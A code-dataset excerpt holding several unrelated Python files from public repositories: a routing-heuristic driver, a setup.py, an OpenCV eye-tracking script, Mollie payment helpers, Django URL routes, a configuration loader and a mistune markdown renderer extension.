(vnd_solution, vnd_agent_list) = vnd.run(
deepcopy(trp_solution), deepcopy(trp_agent_list), cost_matrix)
# print(vnd_agent_list)
# showSolution(vnd_solution)
print('-> final cost:', f(vnd_agent_list))
print('-> recalculated vnd:', getRoutesTotalCost(vnd_solution, cost_matrix))
print("Tempo Gasto: VND %.2f" % (time.time() - start_time_vnd), "seconds ")
print('\n')
| <filename>src/main.py<gh_stars>0
from pathlib import Path
from robin_file_reader import RobinFileReader
from trp import TRP
from vnd import VND
from copy import deepcopy
import time
# file_path = Path("../instances/n5.txt").absolute()
# file_path = Path("../instances/n6.txt").absolute()
# file_path = Path("../instances/n10p4.txt").absolute()
# file_path = Path("../instances/n15p5.txt").absolute()
# file_path = Path("../instances/n29p7A.txt").absolute()
# file_path = Path("../instances/n29p8B.txt").absolute()
# file_path = Path("../instances/n40p11.txt").absolute()
# file_path = Path("../instances/n52p11.txt").absolute()
file_path = Path("../instances_apa_cup/cup1.txt").absolute()
# file_path = Path("../instances_apa_cup/cup2.txt").absolute()
# file_path = Path("../instances_apa_cup/cup3.txt").absolute()
def showSolution(solution):
for route in solution:
print(', '.join(map(str, route)), end=' ;\n')
def f(agent_list):
oF = 0
for i in agent_list:
oF += i['cost']
return oF
def getRoutesTotalCost(solution, cost_matrix):
total_cost = 0
for route in solution:
agent_cost = 0
for address in range(0, len(route) - 1):
address1 = route[address]
address2 = route[address+1]
agent_cost += int(cost_matrix[address1][address2])
total_cost += agent_cost
return total_cost
def calculateSolution(solution, cost_matrix):
total_cost = 0
for route in solution:
for i in range(0, len(route)):
if (i != 0):
origin = route[i-1]
destination = route[i]
# print(origin, destination)
total_cost += cost_matrix[origin][destination]
# print('\n')
print(total_cost)
# calculateSolution(vnd_solution, cost_matrix)
file = open(file_path, 'r')
(dimension, p, cost_matrix) = RobinFileReader(file).getResult()
start_time_trp = time.time()
# constructive algorithm solution
print('constructive algorithm solution')
trp = TRP(dimension, p, cost_matrix)
trp_solution = trp.run()
(initial_cost, trp_agent_list) = trp.calculateTotalCost()
# print(trp_agent_list)
# showSolution(trp_solution)
print('-> total cost:', f(trp_agent_list))
print('-> recalculated trp:', getRoutesTotalCost(trp_solution, cost_matrix))
print("Tempo Gasto: TRP %.2f" % (time.time() - start_time_trp), "seconds ")
print('\n')
start_time_vnd = time.time()
# variable neighbourhood descent solution
print('variable neighbourhood descent solution')
vnd = VND()
(vnd_solution, vnd_agent_list) = vnd.run(
deepcopy(trp_solution), deepcopy(trp_agent_list), cost_matrix)
# print(vnd_agent_list)
# showSolution(vnd_solution)
print('-> final cost:', f(vnd_agent_list))
print('-> recalculated vnd:', getRoutesTotalCost(vnd_solution, cost_matrix))
print("Tempo Gasto: VND %.2f" % (time.time() - start_time_vnd), "seconds ")
print('\n')
| en | 0.492856 | # file_path = Path("../instances/n5.txt").absolute() # file_path = Path("../instances/n6.txt").absolute() # file_path = Path("../instances/n10p4.txt").absolute() # file_path = Path("../instances/n15p5.txt").absolute() # file_path = Path("../instances/n29p7A.txt").absolute() # file_path = Path("../instances/n29p8B.txt").absolute() # file_path = Path("../instances/n40p11.txt").absolute() # file_path = Path("../instances/n52p11.txt").absolute() # file_path = Path("../instances_apa_cup/cup2.txt").absolute() # file_path = Path("../instances_apa_cup/cup3.txt").absolute() # print(origin, destination) # print('\n') # calculateSolution(vnd_solution, cost_matrix) # constructive algorithm solution # print(trp_agent_list) # showSolution(trp_solution) # variable neighbourhood descent solution # print(vnd_agent_list) # showSolution(vnd_solution) | 2.759387 | 3 |
setup.py | Zeex/samp-server-cli | 13 | 6623893 | <reponame>Zeex/samp-server-cli
from distutils.core import setup
setup(
name='samp-server-cli',
version='1.0',
author='Zeex',
author_email='<EMAIL>',
url='https://github.com/Zeex/samp-server-cli',
description='Advanced CLI for GTA: San Andreas Multiplayer (SA-MP) server',
license='BSD',
py_modules = ['samp_server_cli'],
entry_points = {
'console_scripts': ['samp-server-cli=samp_server_cli:main']
},
)
| from distutils.core import setup
setup(
name='samp-server-cli',
version='1.0',
author='Zeex',
author_email='<EMAIL>',
url='https://github.com/Zeex/samp-server-cli',
description='Advanced CLI for GTA: San Andreas Multiplayer (SA-MP) server',
license='BSD',
py_modules = ['samp_server_cli'],
entry_points = {
'console_scripts': ['samp-server-cli=samp_server_cli:main']
},
) | none | 1 | 1.128543 | 1 | |
PythonProjects/Tracking/EyeTracking.py | vygasuresh/img | 263 | 6623894 | __author__ = 'Charlie'
import numpy as np
import cv2
import sys, inspect, os
import argparse
cmd_subfolder = os.path.realpath(
os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "..","..", "Image_Lib")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import image_utils as utils
ap = argparse.ArgumentParser("Track and blur faces in video input")
ap.add_argument("-v", "--video", help="Path to video file. Defaults to webcam video")
args = vars(ap.parse_args())
if not args.get("video", False):
camera = cv2.VideoCapture(0)
else:
camera = cv2.VideoCapture(args["video"])
face_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_eye.xml')
while True:
grabbed, frame = camera.read()
if not grabbed:
print "Camera read failed!"
break
frame = utils.image_resize(frame, height=600)
gray_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray_image, 1.3, 5)
if len(faces) > 0:
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
gray_roi = gray_image[y:y + h, x:x + w]
color_roi = frame[y:y + h, x:x + w]
eyes = eye_cascade.detectMultiScale(gray_roi, 1.1, 4)
print len(eyes)
if len(eyes) > 0:
for ex, ey, ew, eh in eyes:
cv2.rectangle(color_roi, (ex, ey), (ex + ew, ey + eh), (255, 255, 0), 2)
gray_eye_roi = gray_roi[ey:ey + eh, ex:ex + ew]
color_eye_roi = color_roi[ey:ey + eh, ex:ex + ew]
circles = cv2.HoughCircles(gray_eye_roi, cv2.HOUGH_GRADIENT, 1, 20, minRadius=0)
if not circles:
try:
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
cv2.circle(color_eye_roi, (i[0], i[1], i[2]), (0, 0, 255), 2)
cv2.circle(color_eye_roi, (i[0], i[1]), 2, (0, 255, 255), 2)
except AttributeError:
print "circles return empty!"
continue
cv2.imshow("Output", frame)
if cv2.waitKey(1) & 0xFF == ord("q"):
break
camera.release()
cv2.destroyAllWindows()
| __author__ = 'Charlie'
import numpy as np
import cv2
import sys, inspect, os
import argparse
cmd_subfolder = os.path.realpath(
os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "..","..", "Image_Lib")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import image_utils as utils
ap = argparse.ArgumentParser("Track and blur faces in video input")
ap.add_argument("-v", "--video", help="Path to video file. Defaults to webcam video")
args = vars(ap.parse_args())
if not args.get("video", False):
camera = cv2.VideoCapture(0)
else:
camera = cv2.VideoCapture(args["video"])
face_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('Image_Lib/Face_Data/haarcascade_eye.xml')
while True:
grabbed, frame = camera.read()
if not grabbed:
print "Camera read failed!"
break
frame = utils.image_resize(frame, height=600)
gray_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray_image, 1.3, 5)
if len(faces) > 0:
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
gray_roi = gray_image[y:y + h, x:x + w]
color_roi = frame[y:y + h, x:x + w]
eyes = eye_cascade.detectMultiScale(gray_roi, 1.1, 4)
print len(eyes)
if len(eyes) > 0:
for ex, ey, ew, eh in eyes:
cv2.rectangle(color_roi, (ex, ey), (ex + ew, ey + eh), (255, 255, 0), 2)
gray_eye_roi = gray_roi[ey:ey + eh, ex:ex + ew]
color_eye_roi = color_roi[ey:ey + eh, ex:ex + ew]
circles = cv2.HoughCircles(gray_eye_roi, cv2.HOUGH_GRADIENT, 1, 20, minRadius=0)
if not circles:
try:
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
cv2.circle(color_eye_roi, (i[0], i[1], i[2]), (0, 0, 255), 2)
cv2.circle(color_eye_roi, (i[0], i[1]), 2, (0, 255, 255), 2)
except AttributeError:
print "circles return empty!"
continue
cv2.imshow("Output", frame)
if cv2.waitKey(1) & 0xFF == ord("q"):
break
camera.release()
cv2.destroyAllWindows()
| none | 1 | 2.387135 | 2 | |
mollie/ideal/utils.py | nederhoed/django-mollie-ideal | 9 | 6623895 | <reponame>nederhoed/django-mollie-ideal
#-*- coding: utf-8 -*-
from decimal import Decimal
from mollie.ideal.helpers import _get_mollie_xml, get_mollie_bank_choices
from mollie.ideal.settings import MOLLIE_BTW, MOLLIE_TRANSACTION_FEE
def query_mollie(request_dict, mode):
valid_modes = ('check', 'fetch')
if mode not in valid_modes:
raise ValueError("Invalid mode. Valid modes are '%s' and '%s'." % valid_modes)
request_dict['a'] = mode
parsed_xml = _get_mollie_xml(request_dict)
order = parsed_xml.find('order')
response_dict = dict()
response_dict['transaction_id'] = order.findtext('transaction_id')
if mode == 'fetch':
response_dict['order_url'] = order.findtext('URL')
elif mode == 'check':
response_dict['paid'] = order.findtext('payed') # sic!
consumer = order.find('consumer')
response_dict['consumerAcount'] = consumer.findtext('consumerAccount')
response_dict['consumerCity'] = consumer.findtext('consumerCity')
response_dict['consumerName'] = consumer.findtext('consumerName')
return response_dict
def get_mollie_fee(btw=MOLLIE_BTW, fee=MOLLIE_TRANSACTION_FEE):
btw = Decimal(btw)
fee = Decimal(fee)
fee += ((btw / 100) * fee)
return fee.quantize(Decimal(10) ** -2)
get_mollie_banklist = get_mollie_bank_choices
| #-*- coding: utf-8 -*-
from decimal import Decimal
from mollie.ideal.helpers import _get_mollie_xml, get_mollie_bank_choices
from mollie.ideal.settings import MOLLIE_BTW, MOLLIE_TRANSACTION_FEE
def query_mollie(request_dict, mode):
valid_modes = ('check', 'fetch')
if mode not in valid_modes:
raise ValueError("Invalid mode. Valid modes are '%s' and '%s'." % valid_modes)
request_dict['a'] = mode
parsed_xml = _get_mollie_xml(request_dict)
order = parsed_xml.find('order')
response_dict = dict()
response_dict['transaction_id'] = order.findtext('transaction_id')
if mode == 'fetch':
response_dict['order_url'] = order.findtext('URL')
elif mode == 'check':
response_dict['paid'] = order.findtext('payed') # sic!
consumer = order.find('consumer')
response_dict['consumerAcount'] = consumer.findtext('consumerAccount')
response_dict['consumerCity'] = consumer.findtext('consumerCity')
response_dict['consumerName'] = consumer.findtext('consumerName')
return response_dict
def get_mollie_fee(btw=MOLLIE_BTW, fee=MOLLIE_TRANSACTION_FEE):
btw = Decimal(btw)
fee = Decimal(fee)
fee += ((btw / 100) * fee)
return fee.quantize(Decimal(10) ** -2)
get_mollie_banklist = get_mollie_bank_choices | en | 0.67096 | #-*- coding: utf-8 -*- # sic! | 2.06502 | 2 |
DICOMOFFIS/urls.py | pfagomez/DICOMOFFIS | 0 | 6623896 | from django.urls import path, include
from django.shortcuts import redirect
from DICOMOFFIS import views
urlpatterns =[
path("",views.home, name =("home")),
path('home/' , lambda req: redirect('/')),
path('allgemeines/', views.allgemeines, name= ('allgemeines')),
path('allgemeines/dicom-einfuehrung', views.dicom_einfuehrung, name= ('dicom-einfuehrung')),
path('allgemeines/standardisierung/', views.standardisierung, name=("standardisierung")),
path('dcmtk/', views.dcmtk, name = ('dcmtk') ),
path('dcmtk/dcmtk-einfuehrung', views.dcmtk_einfuehrung, name = ('dcmtk-einfuehrung') ),
path('dcmtk/softwareentwicklung-mit-dcmtk', views.softwareentwicklung_mit_dcmtk, name = ('softwareentwicklung-mit-dcmtk') ),
path('dcmtk/dcmtk-tools', views.dcmtk_tools, name = ('dcmtk-tools') ),
path('dcmtk/spenden', views.spenden, name = ('spenden') ),
path('dcmtk/support', views.support, name = ('support') ),
path('dcmtk-erweiterungsmodule/', views.dcmtk_erweiterungsmodule, name=('dcmtk-erweiterungsmodule')),
path('dcmtk-erweiterungsmodule/dcmjp2k', views.dcmjp2k, name=('dcmjp2k')),
path('dcmtk-erweiterungsmodule/dcmppscu', views.dcmppscu, name=('dcmppscu')),
path('dcmtk-erweiterungsmodule/dcmprint', views.dcmprint, name=('dcmprint')),
path('dcmtk-erweiterungsmodule/dcmstcom', views.dcmstcom, name=('dcmstcom')),
path('dcmtk-erweiterungsmodule/ppsmgr', views.ppsmgr, name=('ppsmgr')),
path('dcmtk-erweiterungsmodule/testversionen', views.test_versionen, name=('testversionen')),
path('dcmtk-erweiterungsmodule/dcmpps', views.dcmpps, name=('dcmpps')),
path('dicomscope/', views.dicomscope, name = ("dicomscope")),
path('kontakt/', views.kontakt, name = ("kontakt")),
path('kontakt/ansprechpartner', views.ansprechpartner, name = ("ansprechpartner")),
path('dienstleistungen/', views.dienstleistungen, name = ("dienstleistungen")),
path('dienstleistungen/dicom-beratung', views.dicom_beratung, name = ("dicom-beratung")),
path('dienstleistungen/dicom-schulung', views.dicom_schulung, name = ("dicom-schulung")),
path('dienstleistungen/ihe-schulung', views.ihe_schulung, name = ("ihe-schulung")),
path('dienstleistungen/hl7-schulung', views.hl7_schulung, name = ("hl7-schulung")),
path('datenschutz/', views.datenschutz, name = ("datenschutz")),
path('impressum/', views.impressum, name = ("impressum")),
]
| from django.urls import path, include
from django.shortcuts import redirect
from DICOMOFFIS import views
urlpatterns =[
path("",views.home, name =("home")),
path('home/' , lambda req: redirect('/')),
path('allgemeines/', views.allgemeines, name= ('allgemeines')),
path('allgemeines/dicom-einfuehrung', views.dicom_einfuehrung, name= ('dicom-einfuehrung')),
path('allgemeines/standardisierung/', views.standardisierung, name=("standardisierung")),
path('dcmtk/', views.dcmtk, name = ('dcmtk') ),
path('dcmtk/dcmtk-einfuehrung', views.dcmtk_einfuehrung, name = ('dcmtk-einfuehrung') ),
path('dcmtk/softwareentwicklung-mit-dcmtk', views.softwareentwicklung_mit_dcmtk, name = ('softwareentwicklung-mit-dcmtk') ),
path('dcmtk/dcmtk-tools', views.dcmtk_tools, name = ('dcmtk-tools') ),
path('dcmtk/spenden', views.spenden, name = ('spenden') ),
path('dcmtk/support', views.support, name = ('support') ),
path('dcmtk-erweiterungsmodule/', views.dcmtk_erweiterungsmodule, name=('dcmtk-erweiterungsmodule')),
path('dcmtk-erweiterungsmodule/dcmjp2k', views.dcmjp2k, name=('dcmjp2k')),
path('dcmtk-erweiterungsmodule/dcmppscu', views.dcmppscu, name=('dcmppscu')),
path('dcmtk-erweiterungsmodule/dcmprint', views.dcmprint, name=('dcmprint')),
path('dcmtk-erweiterungsmodule/dcmstcom', views.dcmstcom, name=('dcmstcom')),
path('dcmtk-erweiterungsmodule/ppsmgr', views.ppsmgr, name=('ppsmgr')),
path('dcmtk-erweiterungsmodule/testversionen', views.test_versionen, name=('testversionen')),
path('dcmtk-erweiterungsmodule/dcmpps', views.dcmpps, name=('dcmpps')),
path('dicomscope/', views.dicomscope, name = ("dicomscope")),
path('kontakt/', views.kontakt, name = ("kontakt")),
path('kontakt/ansprechpartner', views.ansprechpartner, name = ("ansprechpartner")),
path('dienstleistungen/', views.dienstleistungen, name = ("dienstleistungen")),
path('dienstleistungen/dicom-beratung', views.dicom_beratung, name = ("dicom-beratung")),
path('dienstleistungen/dicom-schulung', views.dicom_schulung, name = ("dicom-schulung")),
path('dienstleistungen/ihe-schulung', views.ihe_schulung, name = ("ihe-schulung")),
path('dienstleistungen/hl7-schulung', views.hl7_schulung, name = ("hl7-schulung")),
path('datenschutz/', views.datenschutz, name = ("datenschutz")),
path('impressum/', views.impressum, name = ("impressum")),
]
| none | 1 | 1.805697 | 2 | |
src/ciptools/configuration.py | uwcip/python-ciptools | 0 | 6623897 | import errno
import inspect
import logging
import os
import sys
from pathlib import Path
from types import ModuleType
from typing import Any, Tuple, Union
import ciptools.resources
logger = logging.getLogger(__name__)
# this configuration loader was taken from the Flask configuration loader
# the original can be found here: https://github.com/pallets/flask/blob/main/src/flask/config.py
class ConfigurationLoader(dict):
def __init__(self, defaults: dict = None):
dict.__init__(self, defaults or {})
def from_string(self, data: str):
d = ModuleType("configuration")
d.__file__ = "string"
exec(compile(data, "string", "exec"), d.__dict__) # noqa S102
self.from_object(d)
return True
def from_pyfile(self, filename: Union[str, Path], silent: bool = False):
d = ModuleType("configuration")
d.__file__ = filename
try:
with open(filename, mode="rb") as config_file:
exec(compile(config_file.read(), filename, "exec"), d.__dict__) # noqa S102
except IOError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR):
return False
e.strerror = "unable to load configuration file ({})".format(e.strerror)
raise
self.from_object(d)
return True
def from_object(self, obj: Any):
if isinstance(obj, str):
obj = self.import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
@staticmethod
def import_string(import_name, silent=False):
import_name = str(import_name).replace(":", ".")
try:
try:
__import__(import_name)
except ImportError:
if "." not in import_name:
raise
else:
return sys.modules[import_name]
module_name, obj_name = import_name.rsplit(".", 1)
module = __import__(module_name, globals(), locals(), [obj_name])
try:
return getattr(module, obj_name)
except AttributeError as e:
raise ImportError(e) from None
except ImportError:
if not silent:
raise
def load_configuration(package: str = None, path: str = None, environment: str = None) -> Tuple[str, ConfigurationLoader]:
configuration = ConfigurationLoader()
if environment is None:
environment = os.environ.get("ENVIRONMENT") or "development"
if package is None:
if path is None:
path = os.environ.get("CONFIGURATIONS")
if path is None:
# load from a package called "{calling_package}.configurations"
calling_package = inspect.currentframe().f_back.f_globals["__package__"]
if calling_package:
package = ".".join([calling_package, "configurations"])
else:
package = "configurations"
configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
else:
path = os.path.join(path, f"{environment}.conf")
logger.info(f"loading configuration from '{path}'")
configuration.from_pyfile(path)
else:
configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
return environment, configuration
| import errno
import inspect
import logging
import os
import sys
from pathlib import Path
from types import ModuleType
from typing import Any, Tuple, Union
import ciptools.resources
logger = logging.getLogger(__name__)
# this configuration loader was taken from the Flask configuration loader
# the original can be found here: https://github.com/pallets/flask/blob/main/src/flask/config.py
class ConfigurationLoader(dict):
def __init__(self, defaults: dict = None):
dict.__init__(self, defaults or {})
def from_string(self, data: str):
d = ModuleType("configuration")
d.__file__ = "string"
exec(compile(data, "string", "exec"), d.__dict__) # noqa S102
self.from_object(d)
return True
def from_pyfile(self, filename: Union[str, Path], silent: bool = False):
d = ModuleType("configuration")
d.__file__ = filename
try:
with open(filename, mode="rb") as config_file:
exec(compile(config_file.read(), filename, "exec"), d.__dict__) # noqa S102
except IOError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR):
return False
e.strerror = "unable to load configuration file ({})".format(e.strerror)
raise
self.from_object(d)
return True
def from_object(self, obj: Any):
if isinstance(obj, str):
obj = self.import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
@staticmethod
def import_string(import_name, silent=False):
import_name = str(import_name).replace(":", ".")
try:
try:
__import__(import_name)
except ImportError:
if "." not in import_name:
raise
else:
return sys.modules[import_name]
module_name, obj_name = import_name.rsplit(".", 1)
module = __import__(module_name, globals(), locals(), [obj_name])
try:
return getattr(module, obj_name)
except AttributeError as e:
raise ImportError(e) from None
except ImportError:
if not silent:
raise
def load_configuration(package: str = None, path: str = None, environment: str = None) -> Tuple[str, ConfigurationLoader]:
configuration = ConfigurationLoader()
if environment is None:
environment = os.environ.get("ENVIRONMENT") or "development"
if package is None:
if path is None:
path = os.environ.get("CONFIGURATIONS")
if path is None:
# load from a package called "{calling_package}.configurations"
calling_package = inspect.currentframe().f_back.f_globals["__package__"]
if calling_package:
package = ".".join([calling_package, "configurations"])
else:
package = "configurations"
configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
else:
path = os.path.join(path, f"{environment}.conf")
logger.info(f"loading configuration from '{path}'")
configuration.from_pyfile(path)
else:
configuration.from_string(ciptools.resources.files(package).joinpath(f"{environment}.conf").read_text())
return environment, configuration
| en | 0.833538 | # this configuration loader was taken from the Flask configuration loader # the original can be found here: https://github.com/pallets/flask/blob/main/src/flask/config.py # noqa S102 # noqa S102 # load from a package called "{calling_package}.configurations" | 2.253013 | 2 |
ticket/mistune_custom_renderer.py | Xena89/bp-master | 3 | 6623898 | ''''
Copyright (c) 2014 - 2015, <NAME>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the creator nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from mistune import BlockLexer, Renderer, Markdown
import re
class CustomLexer(BlockLexer):
"""
custom mistune blocklexer
adds functionality for offset list items
"""
def parse_list_block(self, m):
bull = m.group(2)
# get the list number if starting higher than 1
off = bull[:-1] if ('.' in bull and int(bull[:-1])>1) else ''
self.tokens.append({
'type': 'list_start',
'ordered': '.' in bull,
'offset': off,
})
self._list_depth += 1
if self._list_depth > self._max_recursive_depth:
self.tokens.append({'type': 'list_item_start'})
self.parse_text(m)
self.tokens.append({'type': 'list_item_end'})
else:
cap = m.group(0)
self._process_list_item(cap, bull)
self.tokens.append({'type': 'list_end'})
self._list_depth -= 1
class ListRenderer(Renderer):
"""
custom markdown renderer for support offset and task lists
"""
def list(self, body, offset, ordered=True):
"""Rendering list tags like ``<ul>`` and ``<ol>``.
:param body: body contents of the list.
:param offset: start offset of the list or None if not present
:param ordered: whether this list is ordered or not.
:return String: listblock as HTML
"""
tag = 'ul'
if ordered:
tag = 'ol'
if isinstance(offset,str) and offset:
tag += ' start="'+ offset +'"'
return '<%s>\n%s</%s>\n' % (tag, body, tag)
def list_item(self, text):
"""
Rendering list item snippet. Like ``<li>``.
adds tasklist support
return: String - listitem as HTML
"""
checkbox = ""
# if listitem begins with an [ xX]
if re.match(r'^\[([ Xx])\]\s(.*)', text):
# if listitem begins with [ ]
if re.match(r'^\[([\s])\]',text):
# checkbox is not checked
checkbox = '<input disabled="" type="checkbox">'
# removes [ ] from listitem
text = text.replace('[ ]','',1)
# if listitem begins with [x] or [X]
if re.match(r'^\[([Xx])\]',text):
# checkbox is checked
checkbox = '<input checked="" disabled="" type="checkbox">'
# removes [Xx]
text = re.sub('\[([Xx])\]','',text,1)
return '<li>%s%s</li>\n' % (checkbox, text)
class CustomMarkdown(Markdown):
"""
prep for returning list as html
calls custom renderer
return: String - parsed markdown list as html
"""
def output_list(self):
ordered = self.token['ordered']
off = self.token.get('offset')
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
body += self.tok()
return self.renderer.list(body, off, ordered)
| ''''
Copyright (c) 2014 - 2015, <NAME>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the creator nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from mistune import BlockLexer, Renderer, Markdown
import re
class CustomLexer(BlockLexer):
"""
custom mistune blocklexer
adds functionality for offset list items
"""
def parse_list_block(self, m):
bull = m.group(2)
# get the list number if starting higher than 1
off = bull[:-1] if ('.' in bull and int(bull[:-1])>1) else ''
self.tokens.append({
'type': 'list_start',
'ordered': '.' in bull,
'offset': off,
})
self._list_depth += 1
if self._list_depth > self._max_recursive_depth:
self.tokens.append({'type': 'list_item_start'})
self.parse_text(m)
self.tokens.append({'type': 'list_item_end'})
else:
cap = m.group(0)
self._process_list_item(cap, bull)
self.tokens.append({'type': 'list_end'})
self._list_depth -= 1
class ListRenderer(Renderer):
"""
custom markdown renderer for support offset and task lists
"""
def list(self, body, offset, ordered=True):
"""Rendering list tags like ``<ul>`` and ``<ol>``.
:param body: body contents of the list.
:param offset: start offset of the list or None if not present
:param ordered: whether this list is ordered or not.
:return String: listblock as HTML
"""
tag = 'ul'
if ordered:
tag = 'ol'
if isinstance(offset,str) and offset:
tag += ' start="'+ offset +'"'
return '<%s>\n%s</%s>\n' % (tag, body, tag)
def list_item(self, text):
"""
Rendering list item snippet. Like ``<li>``.
adds tasklist support
return: String - listitem as HTML
"""
checkbox = ""
# if listitem begins with an [ xX]
if re.match(r'^\[([ Xx])\]\s(.*)', text):
# if listitem begins with [ ]
if re.match(r'^\[([\s])\]',text):
# checkbox is not checked
checkbox = '<input disabled="" type="checkbox">'
# removes [ ] from listitem
text = text.replace('[ ]','',1)
# if listitem begins with [x] or [X]
if re.match(r'^\[([Xx])\]',text):
# checkbox is checked
checkbox = '<input checked="" disabled="" type="checkbox">'
# removes [Xx]
text = re.sub('\[([Xx])\]','',text,1)
return '<li>%s%s</li>\n' % (checkbox, text)
class CustomMarkdown(Markdown):
"""
prep for returning list as html
calls custom renderer
return: String - parsed markdown list as html
"""
def output_list(self):
ordered = self.token['ordered']
off = self.token.get('offset')
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
body += self.tok()
return self.renderer.list(body, off, ordered)
| en | 0.709518 | ' Copyright (c) 2014 - 2015, <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the creator nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. custom mistune blocklexer adds functionality for offset list items # get the list number if starting higher than 1 custom markdown renderer for support offset and task lists Rendering list tags like ``<ul>`` and ``<ol>``. :param body: body contents of the list. :param offset: start offset of the list or None if not present :param ordered: whether this list is ordered or not. :return String: listblock as HTML Rendering list item snippet. Like ``<li>``. adds tasklist support return: String - listitem as HTML # if listitem begins with an [ xX] # if listitem begins with [ ] # checkbox is not checked # removes [ ] from listitem # if listitem begins with [x] or [X] # checkbox is checked # removes [Xx] prep for returning list as html calls custom renderer return: String - parsed markdown list as html | 1.893334 | 2 |
tests/test_templates.py | mwort/modelmanager | 1 | 6623899 | """Test module for the Templates plugin."""
import unittest
import os
import cProfile, pstats
import test_project
